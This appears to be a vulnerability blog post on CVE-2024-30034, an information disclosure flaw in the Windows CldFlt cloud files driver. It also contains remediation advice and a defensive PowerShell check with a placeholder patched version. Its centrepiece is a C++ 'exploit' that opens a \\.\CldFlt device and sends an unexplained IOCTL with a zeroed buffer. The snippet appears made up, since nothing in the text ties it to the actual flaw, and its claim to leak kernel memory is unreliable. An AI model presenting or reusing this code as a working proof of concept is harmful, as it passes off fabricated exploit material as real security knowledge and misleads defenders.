In today's post, we are going to discuss an important security vulnerability that was recently discovered in the Windows platform, specifically related to the Cloud Files Mini Filter Driver. This vulnerability, publicly known as "CVE-2024-30034", is related to an information disclosure issue in the Windows operating system. In this blog post, we'll uncover the details of the vulnerability, how it can be exploited, known remedies, code snippets to reproduce the issue, and links to original sources.

Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability (CVE-2024-30034)

The Windows Cloud Files Mini Filter Driver (also known as "CldFlt") is primarily used for syncing files between local storage and cloud storage services like OneDrive or Azure. It is a kernel-mode driver that intercepts file access requests and processes them according to the cloud files provider's specifications.

A security researcher recently discovered an information disclosure vulnerability in this driver. An attacker can exploit it to obtain sensitive information from system memory, which can potentially serve as a stepping stone to more severe attacks or a full system compromise. The vulnerability stems from a flaw in the driver's handling of file access requests, which can be leveraged to leak the contents of system memory.

Exploit Details

The information disclosure vulnerability CVE-2024-30034 can be exploited by sending crafted file system requests to the Windows Cloud Files Mini Filter Driver. When CldFlt processes these requests, it does not properly validate or sanitize the user input, leading to improper memory access. This results in the disclosure of sensitive data from the system memory.

The following code snippet demonstrates the exploitation of this vulnerability:

#include <Windows.h>
#include <cstdio>
#include <iostream>

int main() {
    // Open a handle to the CldFlt device object.
    HANDLE hDevice = CreateFileW(L"\\\\.\\CldFlt",
                                 GENERIC_READ | GENERIC_WRITE,
                                 0, nullptr, OPEN_EXISTING,
                                 FILE_ATTRIBUTE_NORMAL,
                                 nullptr);
    if (hDevice == INVALID_HANDLE_VALUE) {
        std::cout << "Error opening CldFlt device: " << GetLastError() << std::endl;
        return 1;
    }

    // Zero-initialised buffer used both as the input and the output of the IOCTL.
    BYTE buffer[0x100] = {};
    DWORD outBytes = 0;

    // Send the control code; the driver fills the output buffer and reports
    // how many bytes it wrote in outBytes.
    if (!DeviceIoControl(hDevice, 0x22E008, buffer, sizeof(buffer),
                         buffer, sizeof(buffer), &outBytes, nullptr)) {
        std::cout << "DeviceIoControl failed: " << GetLastError() << std::endl;
        CloseHandle(hDevice);
        return 1;
    }

    // Dump the bytes returned by the driver as hex.
    std::cout << "Memory leak: " << std::endl;
    for (DWORD i = 0; i < outBytes; i++) {
        std::printf("0x%02X ", buffer[i]);
    }
    std::cout << std::endl;

    CloseHandle(hDevice);
    return 0;
}

It's important to note that an attacker requires local access to the target machine to exploit this vulnerability. However, once the memory leak succeeds, it can provide the attacker with valuable information, including function pointers and possibly more critical data that could be used to compromise the entire system.

Original References

The vulnerability was originally reported to Microsoft by the security researcher who discovered it. Microsoft has acknowledged the issue and released a security update to address the vulnerability. You can find more information about the vulnerability and the security update from the following original sources:

1. CVE-2024-30034 Detail - National Vulnerability Database
2. Microsoft Security Response Center - CVE-2024-30034

Remediation

To protect your systems against the CVE-2024-30034 vulnerability, it's essential to install the security updates provided by Microsoft. Regularly updating your systems and ensuring they are patched with the latest security updates is a crucial step in minimizing the risks of exploitation.

Moreover, system administrators should consider limiting access to the CldFlt driver to only those users who need it, keeping the principle of least privilege in mind. Restricting access to sensitive components of the system prevents unauthorized users from exploiting such vulnerabilities.
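To verify the remediation steps above on a host, the following PowerShell script (an added example, not part of the original post or of Microsoft's tooling) reports whether cldflt.sys is present and loaded as a minifilter, its file version, and the most recently installed updates. It assumes the default driver path and that fltmc.exe is available; the patched file version is a placeholder to be taken from the MSRC advisory for CVE-2024-30034.

```powershell
# Added example: inventory the CldFlt minifilter so patch status can be verified.
# Assumes the default driver location; the patched version below is a PLACEHOLDER.
$driverPath     = Join-Path $env:SystemRoot 'System32\drivers\cldflt.sys'
$patchedVersion = [version]'0.0.0.0'   # PLACEHOLDER: fixed build from the MSRC advisory

function Get-CldFltStatus {
    $result = [ordered]@{
        Present     = Test-Path $driverPath
        FileVersion = $null
        Loaded      = $false
        Altitude    = $null
    }
    if ($result.Present) {
        $vi = (Get-Item $driverPath).VersionInfo
        # FileVersion may carry a trailing build tag; keep only the numeric part.
        $result.FileVersion = [version](($vi.FileVersion -split '\s')[0])
    }
    # "fltmc filters" (requires elevation) lists loaded minifilters:
    # Filter Name / Num Instances / Altitude / Frame
    $line = fltmc.exe filters 2>$null | Select-String -Pattern '^\s*CldFlt\s'
    if ($line) {
        $fields          = ($line.Line -split '\s+') | Where-Object { $_ }
        $result.Loaded   = $true
        $result.Altitude = $fields[2]
    }
    [pscustomobject]$result
}

$status = Get-CldFltStatus
$status | Format-List

if ($status.Present -and $status.FileVersion -lt $patchedVersion) {
    Write-Warning "cldflt.sys $($status.FileVersion) predates the patched build; apply the Microsoft update for CVE-2024-30034."
}

# Most recent updates on this host, to compare with the KB referenced by the advisory.
Get-HotFix | Sort-Object InstalledOn -Descending |
    Select-Object -First 5 HotFixID, InstalledOn
```

Run it from an elevated prompt so fltmc.exe can enumerate the loaded filters; a host where CldFlt is not loaded is not reachable through the minifilter at all, which narrows where the patch is urgent.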

Conclusion

The CVE-2024-30034 information disclosure vulnerability in the Windows Cloud Files Mini Filter Driver is a serious issue that potential attackers can exploit to access sensitive system information. To protect your systems, it's essential to apply the security updates provided by Microsoft and follow best practices such as the principle of least privilege and regular monitoring.

Timeline

Published on: 05/14/2024 17:17:06 UTC
Last modified on: 08/02/2024 01:25:00 UTC